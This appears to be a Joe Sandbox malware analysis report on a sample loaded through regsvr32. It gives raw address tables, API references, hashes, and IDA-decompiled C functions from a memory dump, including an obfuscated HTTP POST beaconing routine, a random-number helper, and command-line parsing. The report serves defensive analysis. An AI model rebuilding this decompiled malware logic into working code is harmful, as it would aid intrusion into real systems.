            0x0316ebbe
            0x0316ebc0
            0x0316eed8
            0x0316eedb
            0x0316eede
            0x0316eee0
            0x0316ef02
            0x0316ef07
            0x0316eee2
            0x0316eee5
            0x0316eef0
            0x0316eef7
            0x0316eef7
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0316ebc6
            0x0316ebc6
            0x0316ebd8
            0x0316ebdb
            0x0316ebdd
            0x00000000
            0x00000000
            0x0316ebe5
            0x0316ebe8
            0x0316ebeb
            0x0316ebee
            0x0316ebf1
            0x0316ebf4
            0x00000000
            0x00000000
            0x0316ebfa
            0x0316ec08
            0x0316ec0b
            0x0316ec0d
            0x0316ec26
            0x0316ec35
            0x0316ec3d
            0x0316ec3d
            0x0316ec40
            0x0316ec47
            0x0316ec4b
            0x0316ec51
            0x0316ec53
            0x0316eec0
            0x0316eec6
            0x0316eecc
            0x0316eecf
            0x0316eecf
            0x00000000
            0x0316eecf
            0x0316ec62
            0x0316ec76
            0x0316ec7a
            0x0316ec7c
            0x0316ec81
            0x0316ee8d
            0x0316ee93
            0x0316ee9e
            0x0316eea9
            0x0316eeaf
            0x0316eeb5
            0x0316eeb8
            0x00000000
            0x0316eeb8
            0x0316ec87
            0x0316ee5b
            0x0316ee5b
            0x0316ee5e
            0x0316ee61
            0x00000000
            0x00000000
            0x0316ec8f
            0x0316ec97
            0x0316ec9e
            0x0316eca4
            0x0316eca6
            0x00000000
            0x00000000
            0x0316ecaf
            0x0316ecc4
            0x0316ecca
            0x0316ecd3
            0x0316ecd6
            0x0316ecd9
            0x0316ecdb
            0x0316ee4e
            0x0316ee51
            0x0316ee5a
            0x0316ee5a
            0x00000000
            0x0316ee5a
            0x0316eceb
            0x0316ecee
            0x0316ecf5
            0x0316ecfb
            0x0316ecfe
            0x0316ed01
            0x0316ed04
            0x0316ed07
            0x0316ed43
            0x0316ed43
            0x0316ed46
            0x0316edef
            0x0316ee03
            0x0316ee13
            0x0316ee17
            0x0316ee19
            0x0316ee30
            0x0316ee34
            0x0316ee3d
            0x0316ee48
            0x00000000
            0x0316ee48
            0x0316ee1f
            0x0316ee20
            0x0316ee25
            0x0316ee25
            0x0316ee27
            0x0316ee28
            0x0316ee2d
            0x00000000
            0x0316ee2d
            0x0316ed4c
            0x0316ed4c
            0x0316ed4f
            0x0316edb7
            0x0316edcb
            0x0316eddb
            0x0316eddf
            0x0316ede1
            0x00000000
            0x00000000
            0x0316ede7
            0x0316ede8
            0x00000000
            0x0316ede8
            0x0316ed51
            0x0316ed51
            0x0316ed54
            0x00000000
            0x00000000
            0x0316ed56
            0x0316ed59
            0x00000000
            0x00000000
            0x0316ed5b
            0x0316ed5b
            0x0316ed61
            0x0316ed7a
            0x0316ed89
            0x0316ed92
            0x0316ed97
            0x0316ed9a
            0x0316eda0
            0x0316eda0
            0x0316eda5
            0x0316edb1
            0x00000000
            0x0316edb1
            0x0316ed66
            0x00000000
            0x0316ed66
            0x0316ed09
            0x0316ed30
            0x0316ed35
            0x0316ed3a
            0x0316ed3c
            0x0316ed3c
            0x00000000
            0x0316ed3a
            0x0316ed0b
            0x0316ed0b
            0x0316ed0e
            0x00000000
            0x00000000
            0x0316ed14
            0x0316ed14
            0x0316ed17
            0x00000000
            0x00000000
            0x0316ed1d
            0x0316ed1d
            0x0316ed20
            0x00000000
            0x00000000
            0x0316ed26
            0x0316ed29
            0x00000000
            0x00000000
            0x0316ed2b
            0x00000000
            0x0316ed2b
            0x0316ee6a
            0x0316ee70
            0x0316ee76
            0x0316ee79
            0x0316ee7c
            0x0316ee7c
            0x0316ee7f
            0x0316ee80
            0x0316ee83
            0x0316ee85
            0x00000000
            0x00000000
            0x0316eed5
            0x0316eed5
            0x00000000
            0x0316eed5
            0x0316ec0f
            0x0316ec15
            0x00000000
            0x0316ec15
            0x0316eed2
            0x00000000
            0x0316eb58
            0x0316eb5d
            0x0316eb62
            0x00000000
            0x0316eb66

            APIs
              • Part of subcall function 0316E485: CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,0316E7B4,00000E16,00000000,00000000,00000005), ref: 0316E498
              • Part of subcall function 0316E485: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0316E7B4,00000E16,00000000,00000000,00000005), ref: 0316E4A9
              • Part of subcall function 0316E485: CoCreateInstance.OLE32(0317C8A0,00000000,00000001,0317C8B0,00000000,?,0316E7B4,00000E16,00000000,00000000,00000005), ref: 0316E4C0
              • Part of subcall function 0316E485: SysAllocString.OLEAUT32(00000000), ref: 0316E4CB
              • Part of subcall function 0316E485: CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0316E7B4,00000E16,00000000,00000000,00000005), ref: 0316E4F6
              • Part of subcall function 03168DC9: RtlAllocateHeap.NTDLL(00000008,?,?,03169793,00000100,?,0316661B), ref: 03168DD7
            • SysAllocString.OLEAUT32(00000000), ref: 0316EB73
            • SysAllocString.OLEAUT32(00000000), ref: 0316EB87
            • SysFreeString.OLEAUT32(?), ref: 0316EF0D
            • SysFreeString.OLEAUT32(?), ref: 0316EF16
              • Part of subcall function 03168DDF: HeapFree.KERNEL32(00000000,00000000), ref: 03168E25
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
            • String ID: FALSE$TRUE
            • API String ID: 1290676130-1412513891
            • Opcode ID: 04b57a1773d914d2ef68b9f11dd0399e7cb3c37af4bc7818c964fd233bac4c29
            • Instruction ID: 460615b0513e6618b367175bfcc3ae419dd153317f686d16d066798e20779300
            • Opcode Fuzzy Hash: 04b57a1773d914d2ef68b9f11dd0399e7cb3c37af4bc7818c964fd233bac4c29
            • Instruction Fuzzy Hash: DDE16E7AD00219AFCB14DFE8C984EEEBBB9FF4C300F144559E505AB285DB31A955CB60
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 30%
            			E03172951(intOrPtr* _a4) {
            				signed int _v8;
            				_Unknown_base(*)()* _v12;
            				char _v16;
            				_Unknown_base(*)()* _t15;
            				void* _t20;
            				intOrPtr* _t25;
            				intOrPtr* _t29;
            				struct HINSTANCE__* _t30;
            
            				_v8 = _v8 & 0x00000000;
            				_t30 = GetModuleHandleW(L"advapi32.dll");
            				if(_t30 == 0) {
            					L7:
            					return 1;
            				}
            				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
            				if(_t25 == 0) {
            					goto L7;
            				}
            				_t15 = GetProcAddress(_t30, "CryptGenRandom");
            				_v12 = _t15;
            				if(_t15 == 0) {
            					goto L7;
            				}
            				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
            				if(_t29 == 0) {
            					goto L7;
            				}
            				_push(0xf0000000);
            				_push(1);
            				_push(0);
            				_push(0);
            				_push( &_v8);
            				if( *_t25() == 0) {
            					goto L7;
            				}
            				_t20 = _v12(_v8, 4,  &_v16);
            				 *_t29(_v8, 0);
            				if(_t20 == 0) {
            					goto L7;
            				}
            				 *_a4 = E031728AC( &_v16);
            				return 0;
            			}

            0x03172957
            0x03172969
            0x0317296d
            0x031729e1
            0x00000000
            0x031729e3
            0x0317297d
            0x03172981
            0x00000000
            0x00000000
            0x03172989
            0x0317298b
            0x03172990
            0x00000000
            0x00000000
            0x0317299a
            0x0317299e
            0x00000000
            0x00000000
            0x031729a0
            0x031729a5
            0x031729a7
            0x031729a9
            0x031729ae
            0x031729b3
            0x00000000
            0x00000000
            0x031729be
            0x031729c8
            0x031729cc
            0x00000000
            0x00000000
            0x031729db
            0x00000000

            APIs
            • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,03167C84), ref: 03172963
            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 0317297B
            • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 03172989
            • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 03172998
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc$HandleModule
            • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
            • API String ID: 667068680-129414566
            • Opcode ID: 14a3428bd3d267230a13c582782ba0f882427a78e7b004bbc8dba630225d5073
            • Instruction ID: 9328aa4f919217819be480dd26cd60d90099ff44d28663609a88922120b99070
            • Opcode Fuzzy Hash: 14a3428bd3d267230a13c582782ba0f882427a78e7b004bbc8dba630225d5073
            • Instruction Fuzzy Hash: C0118237E44329BBDB11E6B48C42F9EB6BC9F4C651F1D0561EA00E6140DB70DE068664
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			E0316F7A3(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
            				signed int _v8;
            				signed int _v12;
            				char _v16;
            				char _v20;
            				char _v24;
            				intOrPtr _v28;
            				int _v32;
            				signed int _v36;
            				intOrPtr _v40;
            				intOrPtr _v44;
            				intOrPtr _v48;
            				intOrPtr _v52;
            				char _v56;
            				int _v68;
            				void* _v72;
            				intOrPtr _v92;
            				int _v96;
            				void* _v100;
            				intOrPtr _v104;
            				intOrPtr _v108;
            				char* _v112;
            				char _v116;
            				char _v132;
            				void _v388;
            				void _v644;
            				intOrPtr _t94;
            				intOrPtr _t102;
            				signed int _t104;
            				intOrPtr* _t105;
            				intOrPtr _t110;
            				signed int _t111;
            				signed int _t112;
            				intOrPtr _t115;
            				signed int _t116;
            				char _t117;
            				intOrPtr _t119;
            				char _t122;
            				intOrPtr _t127;
            				signed int _t129;
            				intOrPtr _t135;
            				intOrPtr _t139;
            				intOrPtr _t143;
            				intOrPtr _t145;
            				intOrPtr _t147;
            				intOrPtr _t153;
            				intOrPtr _t155;
            				intOrPtr _t159;
            				void* _t163;
            				signed int _t165;
            				void* _t166;
            				intOrPtr _t179;
            				signed int _t186;
            				char _t188;
            				signed int _t189;
            				void* _t190;
            				char _t193;
            				signed int _t194;
            				signed int _t195;
            				void* _t196;
            
            				_v24 = 4;
            				_v32 = 0;
            				_v28 = 1;
            				_t190 = __edx;
            				memset( &_v388, 0, 0x100);
            				memset( &_v644, 0, 0x100);
            				_t166 = 0x65;
            				_v56 = E03169F6B(_t166);
            				_v52 = E03169F6B(0xcc6);
            				_v48 = E03169F6B(0xe03);
            				_v44 = E03169F6B(0x64c);
            				_t94 = E03169F6B(0x80a);
            				_v36 = _v36 & 0;
            				_t188 = 0x3c;
            				_v40 = _t94;
            				E03168F63( &_v116, 0, 0x100);
            				_v108 = 0x10;
            				_v112 =  &_v132;
            				_v116 = _t188;
            				_v100 =  &_v388;
            				_v96 = 0x100;
            				_v72 =  &_v644;
            				_push( &_v116);
            				_push(0);
            				_v68 = 0x100;
            				_push(E0316A5D0(_t190));
            				_t102 =  *0x317f8f0; // 0x0
            				_push(_t190);
            				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
            					_t104 = 0;
            					__eflags = 0;
            					_v12 = 0;
            					do {
            						_t105 =  *0x317f8f0; // 0x0
            						_v8 = 0x8404f700;
            						_t189 =  *_t105( *0x317f9d8,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
            						__eflags = _t189;
            						if(_t189 != 0) {
            							E0316F73B(_t189);
            							_t110 =  *0x317f8f0; // 0x0
            							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
            							__eflags = _a24;
            							_t165 = _t111;
            							if(_a24 != 0) {
            								E0316A1F8(_a24);
            							}
            							__eflags = _t165;
            							if(_t165 != 0) {
            								__eflags = _v104 - 4;
            								_t112 = 0x8484f700;
            								if(_v104 != 4) {
            									_t112 = _v8;
            								}
            								_t115 =  *0x317f8f0; // 0x0
            								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
            								_v8 = _t116;
            								__eflags = _a24;
            								if(_a24 != 0) {
            									E0316A1F8(_a24);
            									_t116 = _v8;
            								}
            								__eflags = _t116;
            								if(_t116 != 0) {
            									__eflags = _v104 - 4;
            									if(_v104 == 4) {
            										E0316F6E9(_t116);
            									}
            									_t117 = E03169F6B(0x82e);
            									_t193 = _t117;
            									_v16 = _t193;
            									_t119 =  *0x317f8f0; // 0x0
            									_t194 = _v8;
            									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E0316A5D0(_t193), _a4, _a8);
            									E03168D87( &_v16);
            									__eflags = _a24;
            									if(_a24 != 0) {
            										E0316A1F8(_a24);
            									}
            									__eflags = _v8;
            									if(_v8 != 0) {
            										L25:
            										_t122 = 8;
            										_v24 = _t122;
            										_v20 = 0;
            										_v16 = 0;
            										E03168F63( &_v20, 0, _t122);
            										_t127 =  *0x317f8f0; // 0x0
            										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
            										if(__eflags != 0) {
            											_t129 = E0316A102( &_v20, __eflags);
            											__eflags = _t129 - 0xc8;
            											if(_t129 == 0xc8) {
            												 *_a20 = _t194;
            												 *_a12 = _t189;
            												 *_a16 = _t165;
            												__eflags = 0;
            												return 0;
            											}
            											_v12 =  ~_t129;
            											L29:
            											_t135 =  *0x317f8f0; // 0x0
            											 *((intOrPtr*)(_t135 + 8))(_t194);
            											_t195 = _v12;
            											L30:
            											__eflags = _t165;
            											if(_t165 != 0) {
            												_t139 =  *0x317f8f0; // 0x0
            												 *((intOrPtr*)(_t139 + 8))(_t165);
            											}
            											__eflags = _t189;
            											if(_t189 != 0) {
            												_t179 =  *0x317f8f0; // 0x0
            												 *((intOrPtr*)(_t179 + 8))(_t189);
            											}
            											return _t195;
            										}
            										GetLastError();
            										_v12 = 0xfffffff8;
            										goto L29;
            									} else {
            										GetLastError();
            										_t143 =  *0x317f8f0; // 0x0
            										 *((intOrPtr*)(_t143 + 8))(_t194);
            										_t145 =  *0x317f8f0; // 0x0
            										_v8 = _v8 & 0x00000000;
            										 *((intOrPtr*)(_t145 + 8))(_t165);
            										_t147 =  *0x317f8f0; // 0x0
            										_t165 = 0;
            										__eflags = 0;
            										 *((intOrPtr*)(_t147 + 8))(_t189);
            										_t194 = _v8;
            										goto L21;
            									}
            								} else {
            									GetLastError();
            									_t153 =  *0x317f8f0; // 0x0
            									 *((intOrPtr*)(_t153 + 8))(_t165);
            									_t155 =  *0x317f8f0; // 0x0
            									_t165 = 0;
            									 *((intOrPtr*)(_t155 + 8))(_t189);
            									_t189 = 0;
            									_t194 = _v8;
            									goto L22;
            								}
            							} else {
            								GetLastError();
            								_t159 =  *0x317f8f0; // 0x0
            								 *((intOrPtr*)(_t159 + 8))(_t189);
            								L21:
            								_t189 = 0;
            								__eflags = 0;
            								goto L22;
            							}
            						}
            						GetLastError();
            						L22:
            						_t186 = _t194;
            						_t104 = _v12 + 1;
            						_v12 = _t104;
            						__eflags = _t104 - 2;
            					} while (_t104 < 2);
            					__eflags = _t186;
            					if(_t186 != 0) {
            						goto L25;
            					}
            					_t195 = 0xfffffffe;
            					goto L30;
            				}
            				_t163 = 0xfffffffc;
            				return _t163;
            			}

            APIs
            • memset.MSVCRT ref: 0316F7D4
            • memset.MSVCRT ref: 0316F7E5
              • Part of subcall function 03168F63: memset.MSVCRT ref: 03168F75
            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 0316F8BA
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: memset$ErrorLast
            • String ID: POST
            • API String ID: 2570506013-1814004025
            • Opcode ID: fb284558bb22c9b1a8268b2f256e75cc0b1c55bb59ae2da8993ee0da8b80e1f8
            • Instruction ID: 54a8578ba2de461da3f77add017646682671fff040b524577553a99727aa398b
            • Opcode Fuzzy Hash: fb284558bb22c9b1a8268b2f256e75cc0b1c55bb59ae2da8993ee0da8b80e1f8
            • Instruction Fuzzy Hash: 0EA14D75900319AFDB14EFA4D888AAEBBF8FF4C310F194069F515E7250DB349A56CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: _snprintfqsort
            • String ID: %I64d$false$null$true
            • API String ID: 756996078-4285102228
            • Opcode ID: 43a88a3021970acc07e24e2397186e6ab81b80b3d757f01ac1799cbff9e3d38c
            • Instruction ID: f9fcd644b66ef590a7444bbc385834ab5ac0600448919251e3b5748785fd8a62
            • Opcode Fuzzy Hash: 43a88a3021970acc07e24e2397186e6ab81b80b3d757f01ac1799cbff9e3d38c
            • Instruction Fuzzy Hash: DAE16CB594020ABFDF15EE64CC41EAF3B79EF4D784F184065FD169A240E731DAA18BA0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 83%
            			E0316503F(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, WCHAR* _a12) {
            				void _v532;
            				char _v548;
            				char _v580;
            				char _v584;
            				short _v588;
            				WCHAR* _v592;
            				WCHAR* _v596;
            				intOrPtr _v600;
            				char _v628;
            				char _v632;
            				void* __ebx;
            				void* __esi;
            				short _t47;
            				WCHAR* _t54;
            				WCHAR* _t55;
            				intOrPtr _t56;
            				signed int _t61;
            				void* _t65;
            				void* _t66;
            				WCHAR* _t67;
            				intOrPtr _t68;
            				WCHAR* _t70;
            				intOrPtr _t71;
            				WCHAR* _t73;
            				WCHAR* _t83;
            				intOrPtr _t84;
            				void* _t85;
            				intOrPtr _t86;
            				void* _t93;
            				intOrPtr _t94;
            				intOrPtr _t96;
            				void* _t99;
            				void* _t100;
            				WCHAR* _t101;
            				void* _t112;
            				WCHAR* _t116;
            				intOrPtr _t127;
            				void* _t128;
            				void* _t146;
            				WCHAR* _t149;
            				void* _t150;
            				void* _t152;
            				void* _t156;
            				WCHAR* _t157;
            				WCHAR* _t159;
            				signed int _t160;
            				signed int _t161;
            				intOrPtr* _t163;
            				signed int _t165;
            				void* _t168;
            				void* _t169;
            				intOrPtr* _t170;
            				void* _t175;
            
            				_t175 = __fp0;
            				_push(_t160);
            				_t99 = __edx;
            				_t156 = __ecx;
            				_t161 = _t160 | 0xffffffff;
            				memset( &_v532, 0, 0x20c);
            				_t168 = (_t165 & 0xfffffff8) - 0x254 + 0xc;
            				_v592 = 1;
            				if(_t156 != 0) {
            					_t94 =  *0x317f8d4; // 0x4fafc00
            					_t3 = _t94 + 0x110; // 0x4fb16d0
            					_t96 =  *0x317f8d8; // 0x4fafab0
            					_v600 =  *((intOrPtr*)(_t96 + 0x68))(_t156,  *((intOrPtr*)( *_t3)));
            				}
            				if(E0316CB85(_t156) != 0) {
            					L4:
            					_t47 = E0316C85A();
            					_push(_t99);
            					_v588 = _t47;
            					E0316C64D(_t47,  &_v580, _t173, _t175);
            					_t100 = E03164FFB( &_v580,  &_v580, _t173);
            					_t112 = E0316E34A( &_v580, E0316A5D0( &_v580), 0);
            					E0316C870(_t112,  &_v548, _t175);
            					_push(_t112);
            					_t54 = E03163174(_t156,  &_v580, _t173, _t175);
            					_v596 = _t54;
            					if(_t54 != 0) {
            						_push(0);
            						_push(_t100);
            						_push(0x317c9d8);
            						_t55 = E03169C50(_t54);
            						_t169 = _t168 + 0x10;
            						_t101 = _t55;
            						__eflags = _v592;
            						if(__eflags != 0) {
            							_t56 = E03169AB3(_v596);
            							_t116 = _t101;
            							 *0x317f990 = _t56;
            							 *0x317f988 = E03169AB3(_t116);
            							L12:
            							_push(_t116);
            							_t157 = E0316A7C6( &_v532, _t156, _t175, _v588,  &_v584,  &_v596);
            							_t170 = _t169 + 0x10;
            							__eflags = _t157;
            							if(_t157 == 0) {
            								goto L36;
            							}
            							_push(0x317ca26);
            							_t146 = 0xe;
            							E0316AC36(_t146, _t175);
            							E0316AC6F(_t157, _t175, _t101);
            							_t163 = _a4;
            							_push( *_t163);
            							E0316AC11(0xb);
            							_t148 =  *(_t163 + 0x10);
            							__eflags =  *(_t163 + 0x10);
            							if( *(_t163 + 0x10) != 0) {
            								E0316B1B1(_t148, _t175);
            							}
            							_t149 =  *(_t163 + 0xc);
            							__eflags = _t149;
            							if(_t149 != 0) {
            								E0316B1B1(_t149, _t175);
            							}
            							_t65 = E0316A1F8(0);
            							_push(_t149);
            							_t150 = 2;
            							_t66 = E0316ABE3();
            							__eflags = _v592;
            							_t127 = _t65;
            							if(_v592 == 0) {
            								_t127 =  *0x317f8d4; // 0x4fafc00
            								__eflags =  *((intOrPtr*)(_t127 + 0xa4)) - 1;
            								if(__eflags != 0) {
            									_t67 = E03170DDF(_t66, _t101, _t150, _t175, 0, _t101, 0);
            									_t170 = _t170 + 0xc;
            									goto L21;
            								}
            								_t127 = _t127 + 0x228;
            								goto L20;
            							} else {
            								_t68 =  *0x317f8d4; // 0x4fafc00
            								__eflags =  *((intOrPtr*)(_t68 + 0xa4)) - 1;
            								if(__eflags != 0) {
            									L27:
            									__eflags =  *(_t68 + 0x1898) & 0x00000082;
            									if(( *(_t68 + 0x1898) & 0x00000082) != 0) {
            										_t152 = 0x64;
            										E0316F15B(_t152);
            									}
            									E0316565D( &_v580, _t175);
            									_t159 = _a8;
            									_t128 = _t127;
            									__eflags = _t159;
            									if(_t159 != 0) {
            										_t71 =  *0x317f8d4; // 0x4fafc00
            										__eflags =  *((intOrPtr*)(_t71 + 0xa0)) - 1;
            										if( *((intOrPtr*)(_t71 + 0xa0)) != 1) {
            											lstrcpyW(_t159, _t101);
            										} else {
            											_t73 = E0316109A(_t128, 0x153);
            											_v596 = _t73;
            											lstrcpyW(_t159, _t73);
            											E03168D9A( &_v596);
            											 *_t170 = "\"";
            											lstrcatW(_t159, ??);
            											lstrcatW(_t159, _t101);
            											lstrcatW(_t159, "\"");
            										}
            									}
            									_t70 = _a12;
            									__eflags = _t70;
            									if(_t70 != 0) {
            										 *_t70 = _v588;
            									}
            									_t161 = 0;
            									__eflags = 0;
            									goto L36;
            								}
            								_t32 = _t68 + 0x228; // 0x4fafe28
            								_t127 = _t32;
            								L20:
            								_t67 = E031658D2(_t127, _t101, __eflags);
            								L21:
            								__eflags = _t67;
            								if(_t67 >= 0) {
            									_t68 =  *0x317f8d4; // 0x4fafc00
            									goto L27;
            								}
            								_push(0xfffffffd);
            								L6:
            								_pop(_t161);
            								goto L36;
            							}
            						}
            						_t83 = E0316D210(_v588, __eflags);
            						_v596 = _t83;
            						_t84 =  *0x317f8d0; // 0x4faf8c0
            						_t85 =  *((intOrPtr*)(_t84 + 0xdc))(_t83, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
            						__eflags = _t85 - _t161;
            						if(_t85 != _t161) {
            							_t86 =  *0x317f8d0; // 0x4faf8c0
            							 *((intOrPtr*)(_t86 + 0x30))();
            							E03168DDF( &_v632, _t161);
            							_t116 = _t85;
            							goto L12;
            						}
            						E03168DDF( &_v628, _t161);
            						_t61 = 1;
            						goto L37;
            					}
            					_push(0xfffffffe);
            					goto L6;
            				} else {
            					_t93 = E0316308A( &_v532, _t161, 0x105);
            					_t173 = _t93;
            					if(_t93 == 0) {
            						L36:
            						_t61 = _t161;
            						L37:
            						return _t61;
            					}
            					goto L4;
            				}
            			}

            APIs
            • memset.MSVCRT ref: 03165061
            • lstrcpyW.KERNEL32 ref: 031652C7
            • lstrcatW.KERNEL32(00000000,?), ref: 031652E5
            • lstrcatW.KERNEL32(00000000,00000000), ref: 031652E9
            • lstrcatW.KERNEL32(00000000,0317CA28), ref: 031652F1
              • Part of subcall function 03168DDF: HeapFree.KERNEL32(00000000,00000000), ref: 03168E25
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: lstrcat$FreeHeaplstrcpymemset
            • String ID:
            • API String ID: 911671052-0
            • Opcode ID: 23939c2c899062f49bfc0bc0610b91b6c20926c2889a03379b521bb7244bfd5a
            • Instruction ID: 6cb9a26ae453ed506d30ccef643869a3dd5158746c1cfb0d6bcb04711a98cba0
            • Opcode Fuzzy Hash: 23939c2c899062f49bfc0bc0610b91b6c20926c2889a03379b521bb7244bfd5a
            • Instruction Fuzzy Hash: D971D075604301ABD718EBA4DC44B7F73EAAFCD710F18092DF4569B2C0EB7098A58BA1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			E0316DEAB(WCHAR* __ecx) {
            				int _v8;
            				WCHAR* _v12;
            				WCHAR* _v16;
            				WCHAR* _v140;
            				WCHAR* _v144;
            				short _v664;
            				signed int _t28;
            				signed int _t29;
            				signed int _t30;
            				WCHAR* _t36;
            				int _t40;
            				signed int _t41;
            				int _t44;
            				signed int _t45;
            				WCHAR* _t49;
            				signed int _t51;
            				WCHAR* _t52;
            				void* _t53;
            
            				_v8 = _v8 & 0x00000000;
            				_v16 = __ecx;
            				_t51 = 0;
            				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
            				_t44 = _v8;
            				_t41 = 0;
            				_v12 = _t28;
            				if(_t44 <= 0) {
            					L22:
            					_t29 = _t28 | 0xffffffff;
            					__eflags = _t29;
            					return _t29;
            				} else {
            					goto L1;
            				}
            				do {
            					L1:
            					_t49 =  *(_t28 + _t41 * 4);
            					_t30 =  *_t49 & 0x0000ffff;
            					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
            						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
            						_t40 = lstrlenW(_t49);
            						_t45 = 0;
            						if(_t40 <= 0) {
            							L11:
            							_t44 = _v8;
            							_t51 = _t51 + 1;
            							goto L12;
            						} else {
            							goto L8;
            						}
            						do {
            							L8:
            							if(_t49[_t45] == 0x2c) {
            								_t49[_t45] = 0;
            							}
            							_t45 = _t45 + 1;
            						} while (_t45 < _t40);
            						goto L11;
            					}
            					L12:
            					_t28 = _v12;
            					_t41 = _t41 + 1;
            				} while (_t41 < _t44);
            				if(_t51 != 1) {
            					if(__eflags <= 0) {
            						goto L22;
            					}
            					_t52 = _v140;
            					L17:
            					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
            						lstrcpynW(_v16, _t52, 0x104);
            					} else {
            						GetCurrentDirectoryW(0x104,  &_v664);
            						_push(0);
            						_push(_t52);
            						_push(0x317c9d8);
            						_t36 = E03169C50( &_v664);
            						_v12 = _t36;
            						lstrcpynW(_v16, _t36, 0x104);
            						E03168DDF( &_v12, 0xfffffffe);
            					}
            					return 0;
            				}
            				_t52 = _v144;
            				goto L17;
            			}

            APIs
            • GetCommandLineW.KERNEL32 ref: 0316DEC0
            • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 0316DECB
            • lstrlenW.KERNEL32 ref: 0316DF0D
            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0316DF66
            • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 0316DF8B
            • lstrcpynW.KERNEL32(?,?,00000104), ref: 0316DFA9
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
            • String ID:
            • API String ID: 1259063344-0
            • Opcode ID: c0683dc77805b05431262ebab4bb753e7ea9cd85ec255705c6f716951b19825b
            • Instruction ID: a30887a8ca4a1a5c8d27dea610e7307b3d1ecb09adc6f4005967905fa3034260
            • Opcode Fuzzy Hash: c0683dc77805b05431262ebab4bb753e7ea9cd85ec255705c6f716951b19825b
            • Instruction Fuzzy Hash: D231D971E10115ABDF28EBD5E854A6DF7BCEF4D311F1840D9E401E6150DB7099A68B60
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SysAllocString.OLEAUT32(00000000), ref: 0316E6ED
            • SysAllocString.OLEAUT32(?), ref: 0316E6F5
            • SysAllocString.OLEAUT32(00000000), ref: 0316E709
            • SysFreeString.OLEAUT32(?), ref: 0316E784
            • SysFreeString.OLEAUT32(?), ref: 0316E787
            • SysFreeString.OLEAUT32(?), ref: 0316E78C
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: String$AllocFree
            • String ID:
            • API String ID: 344208780-0
            • Opcode ID: 5afcbedcc176c7f9123d48337d1cbad2b01c4a5453916b719909056950c8aa50
